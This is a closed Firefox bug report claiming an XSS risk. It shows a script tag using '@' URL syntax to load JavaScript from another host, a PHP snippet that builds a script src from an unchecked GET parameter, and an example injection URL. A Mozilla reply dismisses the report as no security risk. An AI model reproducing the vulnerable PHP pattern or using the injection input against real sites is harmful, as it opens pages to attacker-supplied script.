Closed
Bug 804146
Opened 12 years ago
Closed 12 years ago
XSS via PHP
Categories
(Core :: General, defect)
Core
General
Tracking
()
RESOLVED
INVALID
People
(Reporter: curtisk, Unassigned)
Details
Hello.
I found Firefox has risk of potential XSS.
If the tag like below in html file,
<script src="http://packetmonster.com@bogus.jp/x"></script>
Firefox read http://bogus.jp/x directory (no alert)
It can force to read external JavaScript code.
----------------------------------
This php script has risk of potential XSS.
<?php
$base="http://packetmonster.com";
echo '<script src="'.htmlspecialchars($base.$_GET["file"]).'"></script>';
?>
------------------------------
Usually accessing by such URL is assumed.
http://packetmonster.com/scriptsrcxss.php?file=/base.js
this URL is possible to execute external JavaScript.
http://packetmonster.com/scriptsrcxss.php?file=@bogus.jp/x
Regards.
-
Yuji Tounai
bogus@bogus.jp
http://twitmatome.bogus.jp/
Comment 2•12 years ago
|
||
There is nothing unknown here nor a security risk. Websites can load scripts from other domains as part of the design of the web.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•